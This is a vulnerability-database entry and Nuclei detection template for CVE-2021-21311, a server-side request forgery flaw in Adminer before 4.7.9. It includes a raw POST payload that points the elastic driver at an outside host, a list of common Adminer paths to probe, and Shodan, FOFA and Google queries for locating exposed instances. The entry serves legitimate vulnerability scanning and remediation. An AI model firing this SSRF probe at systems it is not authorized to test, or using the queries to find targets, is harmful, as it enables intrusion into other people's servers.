CVSS2: 6.4 Medium
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: NONE
  Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

CVSS3: 7.2 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: CHANGED
  Confidentiality Impact: LOW
  Integrity Impact: LOW
  Availability Impact: NONE
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

AI Score: 6.9 Medium
  Confidence: High

EPSS: 0.021 Low
  Percentile: 89.2%
Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2021-21311

info:
  name: Adminer <4.7.9 - Server-Side Request Forgery
  author: Adam Crosser,pwnhxl
  severity: high
  description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage.
  remediation: Upgrade to version 4.7.9 or later.
  reference:
    - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
    - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
    - https://packagist.org/packages/vrana/adminer
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21311
    - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2021-21311
    cwe-id: CWE-918
    epss-score: 0.02092
    epss-percentile: 0.89083
    cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 6
    vendor: adminer
    product: adminer
    shodan-query:
      - title:"Login - Adminer"
      - cpe:"cpe:2.3:a:adminer:adminer"
      - http.title:"login - adminer"
    fofa-query:
      - app="Adminer" && body="4.7.8"
      - title="login - adminer"
      - app="adminer" && body="4.7.8"
    google-query: intitle:"login - adminer"
    hunter-query:
      - app.name="Adminer"&&web.body="4.7.8"
      - app.name="adminer"&&web.body="4.7.8"
  tags: cve2021,cve,adminer,ssrf

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}

    payloads:
      path:
        - "/index.php"
        - "/adminer.php"
        - "/adminer/adminer.php"
        - "/adminer/index.php"
        - "/_adminer.php"
        - "/_adminer/index.php"
    attack: batteringram
    stop-at-first-match: true

    redirects: true
    max-redirects: 1
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>400 - Bad Request</title>"
          - "<title>400 - Bad Request</title>"
        condition: or

      - type: status
        status:
          - 403
# digest: 490a0046304402203bfc7390e904463da3e9e24581c8502ef069540ea7730e15869bcb95630c8519022015b5d7c34b7610cf88d38904246e75218e539c437bb4f86f93301f51843ff291:922c64590222798bb761d5b6d8e72950